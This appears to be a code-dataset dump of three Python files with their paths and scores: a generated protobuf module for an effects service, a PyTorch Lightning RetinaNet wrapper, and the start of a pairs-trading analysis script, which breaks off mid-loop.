options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=61,
serialized_end=162,
)
_REGISTERREQUEST = _descriptor.Descriptor(
name='RegisterRequest',
full_name='effects.RegisterRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect', full_name='effects.RegisterRequest.effect', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=164,
serialized_end=214,
)
_REGISTERRESPONSE = _descriptor.Descriptor(
name='RegisterResponse',
full_name='effects.RegisterResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect_id', full_name='effects.RegisterResponse.effect_id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=216,
serialized_end=253,
)
_REMOVEREQUEST = _descriptor.Descriptor(
name='RemoveRequest',
full_name='effects.RemoveRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect_id', full_name='effects.RemoveRequest.effect_id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=255,
serialized_end=289,
)
_REMOVERESPONSE = _descriptor.Descriptor(
name='RemoveResponse',
full_name='effects.RemoveResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=291,
serialized_end=307,
)
_UPDATEREQUEST = _descriptor.Descriptor(
name='UpdateRequest',
full_name='effects.UpdateRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect', full_name='effects.UpdateRequest.effect', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=309,
serialized_end=357,
)
_UPDATERESPONSE = _descriptor.Descriptor(
name='UpdateResponse',
full_name='effects.UpdateResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=359,
serialized_end=375,
)
_LISTREQUEST = _descriptor.Descriptor(
name='ListRequest',
full_name='effects.ListRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=377,
serialized_end=390,
)
_LISTRESPONSE = _descriptor.Descriptor(
name='ListResponse',
full_name='effects.ListResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effects', full_name='effects.ListResponse.effects', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=392,
serialized_end=440,
)
_DEBUGCLEARSERVICEREQUEST = _descriptor.Descriptor(
name='DebugClearServiceRequest',
full_name='effects.DebugClearServiceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=442,
serialized_end=468,
)
_DEBUGCLEARSERVICERESPONSE = _descriptor.Descriptor(
name='DebugClearServiceResponse',
full_name='effects.DebugClearServiceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=470,
serialized_end=497,
)
_REGISTERREQUEST.fields_by_name['effect'].message_type = _EFFECT
_UPDATEREQUEST.fields_by_name['effect'].message_type = _EFFECT
_LISTRESPONSE.fields_by_name['effects'].message_type = _EFFECT
DESCRIPTOR.message_types_by_name['DeltaModificator'] = _DELTAMODIFICATOR
DESCRIPTOR.message_types_by_name['Effect'] = _EFFECT
DESCRIPTOR.message_types_by_name['RegisterRequest'] = _REGISTERREQUEST
DESCRIPTOR.message_types_by_name['RegisterResponse'] = _REGISTERRESPONSE
DESCRIPTOR.message_types_by_name['RemoveRequest'] = _REMOVEREQUEST
DESCRIPTOR.message_types_by_name['RemoveResponse'] = _REMOVERESPONSE
DESCRIPTOR.message_types_by_name['UpdateRequest'] = _UPDATEREQUEST
DESCRIPTOR.message_types_by_name['UpdateResponse'] = _UPDATERESPONSE
DESCRIPTOR.message_types_by_name['ListRequest'] = _LISTREQUEST
DESCRIPTOR.message_types_by_name['ListResponse'] = _LISTRESPONSE
DESCRIPTOR.message_types_by_name['DebugClearServiceRequest'] = _DEBUGCLEARSERVICEREQUEST
DESCRIPTOR.message_types_by_name['DebugClearServiceResponse'] = _DEBUGCLEARSERVICERESPONSE
DeltaModificator = _reflection.GeneratedProtocolMessageType('DeltaModificator', (_message.Message,), dict(
DESCRIPTOR = _DELTAMODIFICATOR,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DeltaModificator)
))
_sym_db.RegisterMessage(DeltaModificator)
Effect = _reflection.GeneratedProtocolMessageType('Effect', (_message.Message,), dict(
DESCRIPTOR = _EFFECT,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.Effect)
))
_sym_db.RegisterMessage(Effect)
RegisterRequest = _reflection.GeneratedProtocolMessageType('RegisterRequest', (_message.Message,), dict(
DESCRIPTOR = _REGISTERREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RegisterRequest)
))
_sym_db.RegisterMessage(RegisterRequest)
RegisterResponse = _reflection.GeneratedProtocolMessageType('RegisterResponse', (_message.Message,), dict(
DESCRIPTOR = _REGISTERRESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RegisterResponse)
))
_sym_db.RegisterMessage(RegisterResponse)
RemoveRequest = _reflection.GeneratedProtocolMessageType('RemoveRequest', (_message.Message,), dict(
DESCRIPTOR = _REMOVEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RemoveRequest)
))
_sym_db.RegisterMessage(RemoveRequest)
RemoveResponse = _reflection.GeneratedProtocolMessageType('RemoveResponse', (_message.Message,), dict(
DESCRIPTOR = _REMOVERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RemoveResponse)
))
_sym_db.RegisterMessage(RemoveResponse)
UpdateRequest = _reflection.GeneratedProtocolMessageType('UpdateRequest', (_message.Message,), dict(
DESCRIPTOR = _UPDATEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.UpdateRequest)
))
_sym_db.RegisterMessage(UpdateRequest)
UpdateResponse = _reflection.GeneratedProtocolMessageType('UpdateResponse', (_message.Message,), dict(
DESCRIPTOR = _UPDATERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.UpdateResponse)
))
_sym_db.RegisterMessage(UpdateResponse)
ListRequest = _reflection.GeneratedProtocolMessageType('ListRequest', (_message.Message,), dict(
DESCRIPTOR = _LISTREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.ListRequest)
))
_sym_db.RegisterMessage(ListRequest)
ListResponse = _reflection.GeneratedProtocolMessageType('ListResponse', (_message.Message,), dict(
DESCRIPTOR = _LISTRESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.ListResponse)
))
_sym_db.RegisterMessage(ListResponse)
DebugClearServiceRequest = _reflection.GeneratedProtocolMessageType('DebugClearServiceRequest', (_message.Message,), dict(
DESCRIPTOR = _DEBUGCLEARSERVICEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DebugClearServiceRequest)
))
_sym_db.RegisterMessage(DebugClearServiceRequest)
DebugClearServiceResponse = _reflection.GeneratedProtocolMessageType('DebugClearServiceResponse', (_message.Message,), dict(
DESCRIPTOR = _DEBUGCLEARSERVICERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DebugClearServiceResponse)
))
_sym_db.RegisterMessage(DebugClearServiceResponse)
# @@protoc_insertion_point(module_scope) | src/tt_protocol/tt_protocol/protocol/effects_pb2.py |
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='effects.proto',
package='effects',
syntax='proto3',
serialized_pb=_b('\n\reffects.proto\x12\x07\x65\x66\x66\x65\x63ts\"!\n\x10\x44\x65ltaModificator\x12\r\n\x05\x64\x65lta\x18\x01 \x01(\t\"e\n\x06\x45\x66\x66\x65\x63t\x12\n\n\x02id\x18\x01 \x01(\x03\x12\x11\n\tattribute\x18\x02 \x01(\x03\x12\x0e\n\x06\x65ntity\x18\x03 \x01(\x03\x12\r\n\x05value\x18\x04 \x01(\t\x12\x0f\n\x07\x63\x61ption\x18\x05 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x06 \x01(\t\"2\n\x0fRegisterRequest\x12\x1f\n\x06\x65\x66\x66\x65\x63t\x18\x01 \x01(\x0b\x32\x0f.effects.Effect\"%\n\x10RegisterResponse\x12\x11\n\teffect_id\x18\x01 \x01(\x03\"\"\n\rRemoveRequest\x12\x11\n\teffect_id\x18\x01 \x01(\x03\"\x10\n\x0eRemoveResponse\"0\n\rUpdateRequest\x12\x1f\n\x06\x65\x66\x66\x65\x63t\x18\x01 \x01(\x0b\x32\x0f.effects.Effect\"\x10\n\x0eUpdateResponse\"\r\n\x0bListRequest\"0\n\x0cListResponse\x12 \n\x07\x65\x66\x66\x65\x63ts\x18\x01 \x03(\x0b\x32\x0f.effects.Effect\"\x1a\n\x18\x44\x65\x62ugClearServiceRequest\"\x1b\n\x19\x44\x65\x62ugClearServiceResponseb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_DELTAMODIFICATOR = _descriptor.Descriptor(
name='DeltaModificator',
full_name='effects.DeltaModificator',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='delta', full_name='effects.DeltaModificator.delta', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=26,
serialized_end=59,
)
_EFFECT = _descriptor.Descriptor(
name='Effect',
full_name='effects.Effect',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='effects.Effect.id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attribute', full_name='effects.Effect.attribute', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entity', full_name='effects.Effect.entity', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='effects.Effect.value', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='caption', full_name='effects.Effect.caption', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='data', full_name='effects.Effect.data', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=61,
serialized_end=162,
)
_REGISTERREQUEST = _descriptor.Descriptor(
name='RegisterRequest',
full_name='effects.RegisterRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect', full_name='effects.RegisterRequest.effect', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=164,
serialized_end=214,
)
_REGISTERRESPONSE = _descriptor.Descriptor(
name='RegisterResponse',
full_name='effects.RegisterResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect_id', full_name='effects.RegisterResponse.effect_id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=216,
serialized_end=253,
)
_REMOVEREQUEST = _descriptor.Descriptor(
name='RemoveRequest',
full_name='effects.RemoveRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect_id', full_name='effects.RemoveRequest.effect_id', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=255,
serialized_end=289,
)
_REMOVERESPONSE = _descriptor.Descriptor(
name='RemoveResponse',
full_name='effects.RemoveResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=291,
serialized_end=307,
)
_UPDATEREQUEST = _descriptor.Descriptor(
name='UpdateRequest',
full_name='effects.UpdateRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effect', full_name='effects.UpdateRequest.effect', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=309,
serialized_end=357,
)
_UPDATERESPONSE = _descriptor.Descriptor(
name='UpdateResponse',
full_name='effects.UpdateResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=359,
serialized_end=375,
)
_LISTREQUEST = _descriptor.Descriptor(
name='ListRequest',
full_name='effects.ListRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=377,
serialized_end=390,
)
_LISTRESPONSE = _descriptor.Descriptor(
name='ListResponse',
full_name='effects.ListResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='effects', full_name='effects.ListResponse.effects', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=392,
serialized_end=440,
)
_DEBUGCLEARSERVICEREQUEST = _descriptor.Descriptor(
name='DebugClearServiceRequest',
full_name='effects.DebugClearServiceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=442,
serialized_end=468,
)
_DEBUGCLEARSERVICERESPONSE = _descriptor.Descriptor(
name='DebugClearServiceResponse',
full_name='effects.DebugClearServiceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=470,
serialized_end=497,
)
_REGISTERREQUEST.fields_by_name['effect'].message_type = _EFFECT
_UPDATEREQUEST.fields_by_name['effect'].message_type = _EFFECT
_LISTRESPONSE.fields_by_name['effects'].message_type = _EFFECT
DESCRIPTOR.message_types_by_name['DeltaModificator'] = _DELTAMODIFICATOR
DESCRIPTOR.message_types_by_name['Effect'] = _EFFECT
DESCRIPTOR.message_types_by_name['RegisterRequest'] = _REGISTERREQUEST
DESCRIPTOR.message_types_by_name['RegisterResponse'] = _REGISTERRESPONSE
DESCRIPTOR.message_types_by_name['RemoveRequest'] = _REMOVEREQUEST
DESCRIPTOR.message_types_by_name['RemoveResponse'] = _REMOVERESPONSE
DESCRIPTOR.message_types_by_name['UpdateRequest'] = _UPDATEREQUEST
DESCRIPTOR.message_types_by_name['UpdateResponse'] = _UPDATERESPONSE
DESCRIPTOR.message_types_by_name['ListRequest'] = _LISTREQUEST
DESCRIPTOR.message_types_by_name['ListResponse'] = _LISTRESPONSE
DESCRIPTOR.message_types_by_name['DebugClearServiceRequest'] = _DEBUGCLEARSERVICEREQUEST
DESCRIPTOR.message_types_by_name['DebugClearServiceResponse'] = _DEBUGCLEARSERVICERESPONSE
DeltaModificator = _reflection.GeneratedProtocolMessageType('DeltaModificator', (_message.Message,), dict(
DESCRIPTOR = _DELTAMODIFICATOR,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DeltaModificator)
))
_sym_db.RegisterMessage(DeltaModificator)
Effect = _reflection.GeneratedProtocolMessageType('Effect', (_message.Message,), dict(
DESCRIPTOR = _EFFECT,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.Effect)
))
_sym_db.RegisterMessage(Effect)
RegisterRequest = _reflection.GeneratedProtocolMessageType('RegisterRequest', (_message.Message,), dict(
DESCRIPTOR = _REGISTERREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RegisterRequest)
))
_sym_db.RegisterMessage(RegisterRequest)
RegisterResponse = _reflection.GeneratedProtocolMessageType('RegisterResponse', (_message.Message,), dict(
DESCRIPTOR = _REGISTERRESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RegisterResponse)
))
_sym_db.RegisterMessage(RegisterResponse)
RemoveRequest = _reflection.GeneratedProtocolMessageType('RemoveRequest', (_message.Message,), dict(
DESCRIPTOR = _REMOVEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RemoveRequest)
))
_sym_db.RegisterMessage(RemoveRequest)
RemoveResponse = _reflection.GeneratedProtocolMessageType('RemoveResponse', (_message.Message,), dict(
DESCRIPTOR = _REMOVERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.RemoveResponse)
))
_sym_db.RegisterMessage(RemoveResponse)
UpdateRequest = _reflection.GeneratedProtocolMessageType('UpdateRequest', (_message.Message,), dict(
DESCRIPTOR = _UPDATEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.UpdateRequest)
))
_sym_db.RegisterMessage(UpdateRequest)
UpdateResponse = _reflection.GeneratedProtocolMessageType('UpdateResponse', (_message.Message,), dict(
DESCRIPTOR = _UPDATERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.UpdateResponse)
))
_sym_db.RegisterMessage(UpdateResponse)
ListRequest = _reflection.GeneratedProtocolMessageType('ListRequest', (_message.Message,), dict(
DESCRIPTOR = _LISTREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.ListRequest)
))
_sym_db.RegisterMessage(ListRequest)
ListResponse = _reflection.GeneratedProtocolMessageType('ListResponse', (_message.Message,), dict(
DESCRIPTOR = _LISTRESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.ListResponse)
))
_sym_db.RegisterMessage(ListResponse)
DebugClearServiceRequest = _reflection.GeneratedProtocolMessageType('DebugClearServiceRequest', (_message.Message,), dict(
DESCRIPTOR = _DEBUGCLEARSERVICEREQUEST,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DebugClearServiceRequest)
))
_sym_db.RegisterMessage(DebugClearServiceRequest)
DebugClearServiceResponse = _reflection.GeneratedProtocolMessageType('DebugClearServiceResponse', (_message.Message,), dict(
DESCRIPTOR = _DEBUGCLEARSERVICERESPONSE,
__module__ = 'effects_pb2'
# @@protoc_insertion_point(class_scope:effects.DebugClearServiceResponse)
))
_sym_db.RegisterMessage(DebugClearServiceResponse)
# @@protoc_insertion_point(module_scope) | 0.204978 | 0.17749 |
__all__ = ['RetinaNetModule', 'save_final']
# Cell
import json, os, requests, sys, tarfile
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import numpy as np
import pickle
import random
from collections import defaultdict
from functools import reduce
from IPython.utils import io
from pathlib import Path
from PIL import Image
from PIL import ImageStat
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
from tqdm import tqdm
from typing import Hashable, List, Tuple, Union
# Cell
import albumentations as A
import torch, torchvision
import pytorch_lightning as pl
import torch.nn.functional as F
import torch.multiprocessing
from torch import nn
from torch.nn.modules import module
from torch import optim
from torch.utils.data import DataLoader, random_split
from torchvision.models.detection import RetinaNet, retinanet_resnet50_fpn
from .subcoco_utils import *
from .subcoco_lightning_utils import *
torch.multiprocessing.set_sharing_strategy('file_system')
print(f"Python ver {sys.version}, torch {torch.__version__}, torchvision {torchvision.__version__}, pytorch_lightning {pl.__version__}")
if is_notebook():
from nbdev.showdoc import *
# Cell
class RetinaNetModule(AbstractDetectorLightningModule):
def __init__(self, **kwargs):
AbstractDetectorLightningModule.__init__(self, **kwargs)
def create_model(self, backbone_name, num_classes=1, **kwargs):
model = retinanet_resnet50_fpn(pretrained=False, num_classes=num_classes+1, pretrained_backbone=True)
# Hacked to avoid model builtin call to GeneralizedRCNNTransform.normalize() as done in augmentation
def noop_normalize(image): return image
# Hacked to avoid model builtin call to GeneralizedRCNNTransform.resize() as done in augmentation
def noop_resize(image, target): return image, target
# HACK!! IceVision does this too!
model.transform.normalize = noop_normalize
model.transform.resize = noop_resize
return model
def get_main_model(self): return self.model
def get_head(self): return self.model.head
def get_backbone(self): return self.model.backbone
# Cell
def save_final(retnet_model, model_save_path):
torch.save(retnet_model.model.state_dict(), model_save_path) | mcbbox/subcoco_retnet_lightning.py |
__all__ = ['RetinaNetModule', 'save_final']
# Cell
import json, os, requests, sys, tarfile
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
import numpy as np
import pickle
import random
from collections import defaultdict
from functools import reduce
from IPython.utils import io
from pathlib import Path
from PIL import Image
from PIL import ImageStat
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
from tqdm import tqdm
from typing import Hashable, List, Tuple, Union
# Cell
import albumentations as A
import torch, torchvision
import pytorch_lightning as pl
import torch.nn.functional as F
import torch.multiprocessing
from torch import nn
from torch.nn.modules import module
from torch import optim
from torch.utils.data import DataLoader, random_split
from torchvision.models.detection import RetinaNet, retinanet_resnet50_fpn
from .subcoco_utils import *
from .subcoco_lightning_utils import *
torch.multiprocessing.set_sharing_strategy('file_system')
print(f"Python ver {sys.version}, torch {torch.__version__}, torchvision {torchvision.__version__}, pytorch_lightning {pl.__version__}")
if is_notebook():
from nbdev.showdoc import *
# Cell
class RetinaNetModule(AbstractDetectorLightningModule):
def __init__(self, **kwargs):
AbstractDetectorLightningModule.__init__(self, **kwargs)
def create_model(self, backbone_name, num_classes=1, **kwargs):
model = retinanet_resnet50_fpn(pretrained=False, num_classes=num_classes+1, pretrained_backbone=True)
# Hacked to avoid model builtin call to GeneralizedRCNNTransform.normalize() as done in augmentation
def noop_normalize(image): return image
# Hacked to avoid model builtin call to GeneralizedRCNNTransform.resize() as done in augmentation
def noop_resize(image, target): return image, target
# HACK!! IceVision does this too!
model.transform.normalize = noop_normalize
model.transform.resize = noop_resize
return model
def get_main_model(self): return self.model
def get_head(self): return self.model.head
def get_backbone(self): return self.model.backbone
# Cell
def save_final(retnet_model, model_save_path):
torch.save(retnet_model.model.state_dict(), model_save_path) | 0.705075 | 0.181717 |
import numpy as np
import pandas as pd
from statsmodels.tsa.stattools import coint
import matplotlib.pyplot as plt
# Set a seed value to make the experience reproducible
np.random.seed(123)
import pandas as pd
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 1000)
import numpy as np
import matplotlib.pyplot as plt
from statsmodels.tsa.stattools import coint
import seaborn
from pandas_datareader import data
symbolsIds = ['SPY','AAPL','ADBE','LUV','MSFT','SKYW','QCOM',
'HPQ','JNPR','AMD','IBM']
def load_financial_data(symbols, start_date, end_date,output_file):
try:
df = pd.read_pickle(output_file)
print('File data found...reading symbols data')
except FileNotFoundError:
print('File not found...downloading the symbols data')
df = data.DataReader(symbols, 'yahoo', start_date, end_date)
df.to_pickle(output_file)
return df
data=load_financial_data(symbolsIds,start_date='2001-01-01',
end_date = '2018-01-01',
output_file='multi_data_large.pkl')
Symbol1_prices = data['Adj Close']['MSFT']
Symbol1_prices.plot(figsize=(15,7))
plt.show()
Symbol2_prices = data['Adj Close']['JNPR']
Symbol2_prices.name = 'JNPR'
plt.title("MSFT and JNPR prices")
Symbol1_prices.plot()
Symbol2_prices.plot()
plt.legend()
plt.show()
def zscore(series):
return (series - series.mean()) / np.std(series)
score, pvalue, _ = coint(Symbol1_prices, Symbol2_prices)
print(pvalue)
ratios = Symbol1_prices / Symbol2_prices
plt.title("Ration between Symbol 1 and Symbol 2 price")
ratios.plot()
plt.show()
#plt.axhline(ratios.mean())
#plt.legend([' Ratio'])
zscore(ratios).plot()
plt.title("Z-score evolution")
plt.axhline(zscore(ratios).mean(),color="black")
plt.axhline(1.0, color="red")
plt.axhline(-1.0, color="green")
plt.show()
ratios.plot()
buy = ratios.copy()
sell = ratios.copy()
buy[zscore(ratios)>-1] = 0
sell[zscore(ratios)<1] = 0
buy.plot(color="g", linestyle="None", marker="^")
sell.plot(color="r", linestyle="None", marker="v")
x1,x2,y1,y2 = plt.axis()
plt.axis((x1,x2,ratios.min(),ratios.max()))
plt.legend(["Ratio", "Buy Signal", "Sell Signal"])
plt.show()
symbol1_buy=Symbol1_prices.copy()
symbol1_sell=Symbol1_prices.copy()
symbol2_buy=Symbol2_prices.copy()
symbol2_sell=Symbol2_prices.copy()
Symbol1_prices.plot()
symbol1_buy[zscore(ratios)>-1] = 0
symbol1_sell[zscore(ratios)<1] = 0
symbol1_buy.plot(color="g", linestyle="None", marker="^")
symbol1_sell.plot(color="r", linestyle="None", marker="v")
pair_correlation_trading_strategy = pd.DataFrame(index=Symbol1_prices.index)
pair_correlation_trading_strategy['symbol1_price']=Symbol1_prices
pair_correlation_trading_strategy['symbol1_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol1_sell']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_buy']=np.zeros(len(Symbol1_prices))
pair_correlation_trading_strategy['symbol2_sell']=np.zeros(len(Symbol1_prices))
position=0
for i in range(len(Symbol1_prices)):
s1price=Symbol1_prices[i]
s2price=Symbol2_prices[i]
if not position and symbol1_buy[i]!=0:
pair_correlation_trading_strategy['symbol1_buy'][i]=s1price
